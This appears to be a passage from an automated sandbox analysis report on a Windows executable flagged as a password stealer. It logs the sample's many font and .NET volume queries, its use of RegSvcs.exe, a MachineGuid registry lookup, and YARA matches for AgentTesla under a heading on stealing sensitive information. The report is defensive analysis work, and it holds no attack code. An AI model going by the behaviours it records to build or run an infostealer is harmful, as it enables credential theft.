Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE
